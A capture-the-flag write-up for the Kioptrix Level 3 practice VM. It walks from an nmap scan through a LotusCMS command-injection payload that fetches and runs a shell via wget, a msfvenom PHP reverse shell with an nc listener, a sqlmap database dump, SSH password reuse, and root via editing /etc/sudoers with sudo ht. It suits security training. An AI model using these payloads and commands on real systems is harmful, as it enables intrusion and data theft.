This is my writeup for the Kioptrix Level 3 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.
When scanning the host with nmap we find two open ports
- 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 12:06 EDT Nmap scan report for 192.168.254.168 Host is up (0.0012s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) MAC Address: 00:0C:29:F1:E7:C5 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds
Accessing the host at port 80 we get a web app:
When inspecting the source code, we can find LotusCMS in the meta-tag keywords.
There seems to be a Remote Command Execution vulnerability in this CMS.
If we try to access the gallery link this page is not rendered correctly. This is beacause assets can't be loaded due to the fixed base href. If one read the description, there is a hint.
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
So let's create a hosts-entry:
$ echo "__IP__ kioptrix3.com" >> /etc/hosts
When looking at the meta-tag generator we can see Gallarific. What seems to be a gallery web app.
Let's check searchsploit if the exist any known vulnerabilities.
We try to get a shell using the Remote Command Execution:
Create a shell:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=__IP__ LPORT=__PORT__ -f raw > shell.php
Upload the shell:
kioptrix3.com/index.php?page=index');shell_exec('wget http://__IP__/php_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php');//
$ nc -nvlp 42
Kick the shell:
Let's try the SQL injection from the searchsploit list.
To exploit an SQL injection, we use sqlmap:
TODO: It came to my attention, that sqlmap is forbidden as well. Do this manually.
$ sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --random-agent --level 5 --risk 3 -D gallery --dump
A common mistake people make is reuse passwords. In this case loneferret uses the same password for Gallarific and SSH. This allows us to log in to the box.
We're on the box but with limited access. Next step is to escalate our privileges.
CompanyPolicy.README which is located in loneferret's home directory looks interesting.
The CEO orders users to use sudo ht to view, edit or create files.
What is HT Editor?
This program is a file viewer, editor and analyzer for text, binary, and (especially) executable files.
setuid and setgid (short for "set user ID upon execution" and "set group ID upon execution", respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group respectively and to change behaviour in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.
setuid and setgid are needed for tasks that require higher privileges than those which common users have, such as changing their login password.
In this case that means we can view, edit or create any file as root.
Let's try to edit /etc/sudoers.
$ sudo ht -t /etc/sudoers
If we can remove the exclamation mark and change the path to /bin/su, we would be able to run /bin/su which would make us root.
$ sudo ht -t /etc/sudoers (-t for text editor mode)
Edit the file and press ctrl+w
Let's try to run su:
And finally read the flag: